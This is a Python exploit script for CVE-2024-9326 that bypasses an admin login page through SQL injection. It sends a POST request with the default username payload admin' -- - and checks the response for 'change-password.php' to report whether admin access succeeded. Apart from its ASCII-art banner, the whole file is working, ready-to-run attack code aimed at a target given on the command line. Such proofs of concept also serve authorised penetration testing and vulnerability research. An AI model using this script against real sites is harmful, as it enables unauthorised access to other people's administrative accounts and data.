#!/usr/bin/env python3

#===========================================================
#        SQL Injection Login Exploit Script (CVE-2024-9326)
#
#Written by: Arvin Rafael Legaspi
#Date: October 5, 2024
#===========================================================

import requests
import argparse

def ascii():
    print(r"""   _____  ____  _        _____       _           _   _             
  / ____|/ __ \| |      |_   _|     (_)         | | (_)            
 | (___ | |  | | |        | |  _ __  _  ___  ___| |_ _  ___  _ __  
  \___ \| |  | | |        | | | '_ \| |/ _ \/ __| __| |/ _ \| '_ \ 
  ____) | |__| | |____   _| |_| | | | |  __/ (__| |_| | (_) | | | |
 |_____/ \___\_\______| |_____|_| |_| |\___|\___|\__|_|\___/|_| |_| 
                                   _/ |                            
                                  |__/                             """)

# Setting up command-line argument parsing
def main():
    ascii()
    parser = argparse.ArgumentParser(description='SQL Injection login script for CVE-2024-9326.')
    
    # Set the target URL argument as required
    parser.add_argument('-t', '--target', required=True, help='Target URL of the vulnerable admin login page')
    parser.add_argument('-P', '--port', type=int, default=80, help='Port number of the target server (default: 80)')
    parser.add_argument('-u', '--username', type=str, default="admin' -- -", help='SQL injection payload for the username')
    parser.add_argument('-p', '--password', type=str, default="pass123", help='Password for the login (default: pass123)')
    
    # Parsing arguments
    args = parser.parse_args()
    
    # Formulate the target URL with the specified port
    target_url = f"{args.target}:{args.port}" if args.port != 80 else args.target
    
    # Setting up SQL Injection based on the provided arguments
    perform_sqli(target_url, args.username, args.password)

# Function to execute the SQL injection attack
def perform_sqli(target_url, username_payload, password_payload):
    # Setup a POST request to the target URL
    post_data = {
        'username': username_payload,
        'password': password_payload,
        'submit': 'Login' 
    }

    try:
        # Send the POST request
        response = requests.post(target_url, data=post_data)

        # Output the response from the server
        print("Response:\n")
        
        print("=====================================================================")
        # Confirms the indication of a successful login
        if 'change-password.php' in response.text:
            print("\nLogin successful! You may have access to the admin panel.")
        else:
            print("\nLogin failed.")
        print("\n=====================================================================")
    except requests.exceptions.RequestException as e:
        # Print any error if it occurs during the request
        print(f"Error: {e}")

if __name__ == "__main__":
    main()